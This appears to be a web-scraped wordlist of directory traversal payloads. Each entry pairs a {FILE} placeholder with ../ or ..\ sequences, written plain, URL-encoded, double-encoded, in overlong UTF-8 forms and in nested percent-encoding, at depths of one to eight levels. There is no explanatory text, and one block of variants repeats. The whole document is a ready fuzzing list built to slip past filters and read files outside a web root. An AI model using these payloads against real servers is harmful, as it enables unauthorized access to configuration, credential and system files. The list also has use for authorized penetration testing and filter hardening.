%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
